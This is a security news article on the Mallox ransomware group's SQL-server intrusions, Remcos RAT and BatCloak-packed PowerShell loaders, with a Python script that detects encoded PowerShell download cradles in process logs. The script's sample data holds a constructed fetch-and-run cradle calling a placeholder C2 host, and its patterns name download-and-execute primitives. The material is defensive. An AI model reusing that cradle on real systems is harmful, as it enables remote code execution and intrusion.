
Mallox Ransomware Group Enhances Malware Variants and Evasion Tactics


The Mallox ransomware group has increased its targeted attacks against organizations with vulnerable SQL servers. Recently, the group surfaced with a new variant and additional malware tools to increase its persistence and avoid detection while gaining momentum.

Mallox, also known as TargetCompany, Fargo, and Tohnichi, emerged in June 2021. In its latest attacks, the group combined its custom ransomware with two established malware tools, the Remcos RAT and the BatCloak obfuscator, as revealed by researchers from TrendMicro in a recent blog post.

Despite the new tools, the group’s method of gaining entry into targeted networks remains consistent. They exploit vulnerable SQL servers to deploy their first stage. The group commonly exploits two remote code execution vulnerabilities, CVE-2020-0618 and CVE-2019-1068, in their attacks.

However, the researchers discovered that the group has started changing its tactics in the later stages of the attack to maintain a stealthy presence on targeted networks and conceal its malicious activity. The group tries several approaches to achieve persistence, such as changing URLs or file paths, until it successfully executes the Remcos RAT.

The team at TrendMicro identified the campaign while investigating suspicious network connections related to PowerShell. This led to the discovery of a new variant of Mallox, which they referred to as TargetCompany. The payload binary of this variant belongs to the second version of the ransomware family, characterized by a connection to a command-and-control server with a ‘/ap.php’ landing page.

However, the initial access attempt was terminated and blocked by existing security solutions. In response, the attackers used a fully undetectable (FUD)-wrapped version of their binaries to continue the attack. FUD is a packing and obfuscation technique that scrambles the ransomware so that signature-based detection cannot recognize it. Mallox appears to be using the FUD style employed by BatCloak: a batch file serves as the outer layer, which then decodes and loads the payload using PowerShell for execution.
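The batch-file-to-PowerShell loader pattern described above leaves a recognizable trace in process-creation telemetry: a PowerShell process whose parent is cmd.exe, launched with window-hiding and policy-bypass flags and an -EncodedCommand payload that, once decoded, fetches and runs remote content. The following Python script is an added example (not code from this article or from TrendMicro's research) that scans a simplified, constructed key=value log format for that combination. The field names (parent, image, cmdline), the hostname c2.example.invalid and all sample lines are assumptions made for illustration; the only indicator taken from the article is the ‘/ap.php’ landing page.

```python
"""Surface batch-launched, encoded PowerShell loaders in process-creation logs.

Added example; the log layout below is a constructed key=value form loosely
modelled on process-creation telemetry (parent image, image, command line),
not a real product's schema.
"""
import base64
import re
from typing import Dict, List, Optional

# key=value tokens; values may be double-quoted (command lines contain spaces).
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = re.compile(r'(?i)(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)')

# Flags typical of a loader that wants to stay quiet and skip execution policy.
_HIDE_FLAGS = re.compile(
    r'(?i)(?:^|\s)-(?:w|windowstyle)\s+hidden'
    r'|(?:^|\s)-(?:nop|noprofile)\b'
    r'|(?:^|\s)-(?:ep|executionpolicy)\s+bypass'
)

# Download-and-execute primitives, plus the landing page named in the article.
_SUSPICIOUS_SCRIPT = re.compile(
    r'(?i)downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b'
    r'|frombase64string|/ap\.php'
)


def _encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse -EncodedCommand encoding; None if the blob is not valid."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value log line into a dict, stripping quotes."""
    return {k: (v[1:-1] if v.startswith('"') else v) for k, v in _KV.findall(line)}


def analyze_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding when at least two loader indicators coincide, else None."""
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    cmdline = event.get("cmdline", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None
    reasons: List[str] = []
    if parent.endswith("cmd.exe"):
        reasons.append("powershell spawned by cmd.exe (batch outer layer)")
    if _HIDE_FLAGS.search(cmdline):
        reasons.append("hidden window / no profile / execution policy bypass")
    decoded = None
    match = _ENC_FLAG.search(cmdline)
    if match:
        reasons.append("encoded command on the command line")
        decoded = decode_encoded_command(match.group(1))
        if decoded and _SUSPICIOUS_SCRIPT.search(decoded):
            reasons.append("decoded script downloads or executes remote content")
    if len(reasons) < 2:          # a lone indicator is common benign admin activity
        return None
    return {"parent": parent, "image": image, "reasons": reasons, "decoded": decoded}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Run analyze_event over every non-empty line and collect findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            finding = analyze_event(parse_event(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample telemetry (not real IoCs); the second line mimics the
# batch -> encoded PowerShell -> download cradle chain, the others are benign.
_CONSTRUCTED_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/ap.php')"
SAMPLE_LOG = "\n".join([
    r'parent=C:\Windows\explorer.exe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe C:\Users\alice\notes.txt"',
    r'parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    + 'cmdline="powershell.exe -nop -w hidden -ep bypass -enc ' + _encode_ps(_CONSTRUCTED_CRADLE) + '"',
    r'parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -File C:\scripts\nightly-backup.ps1"',
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['parent']} -> {f['image']}")
        for r in f["reasons"]:
            print("  -", r)
        print("  decoded:", f["decoded"])
```

The script decodes the -EncodedCommand argument rather than matching on the base64 text, because the same cradle re-encodes to a different blob whenever a URL or whitespace changes, which is exactly the "changing URLs or paths" behaviour the researchers describe. Requiring two coinciding indicators keeps a lone cmd.exe-launched scheduled script (the third sample line) out of the alert queue.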

The group also used the Metasploit framework in a later stage of the attack, before the Remcos RAT completed its final routine. This allowed them to load the Mallox ransomware wrapped in the FUD packer. While the use of FUD packers and Metasploit is not new, it demonstrates the group’s determination to innovate and evade existing security solutions.

Security teams and organizations should not underestimate the effectiveness of these tactics in circumventing current security solutions. The researchers emphasize the importance of visibility into patching gaps and checking all possible attack surfaces to prevent exploitation.

Given that the FUD packer used by Mallox appears to outsmart current security solutions, researchers recommend incorporating AI- and machine learning-based file checking and behavior monitoring solutions. Additionally, implementing best practices for network blocking, specific ransomware detection, and blocking measures can provide a multi-layered approach to mitigating the impact of threats like Mallox.

Organizations should also prioritize user awareness and run regular exercises to prevent intrusion attempts and the execution of malicious activity.

Overall, Mallox continues to evolve and pose a significant threat to organizations with vulnerable SQL servers. It is crucial for security teams and organizations to stay vigilant, adapt their defense strategies, and prioritize proactive measures to defend against this persistent ransomware group.
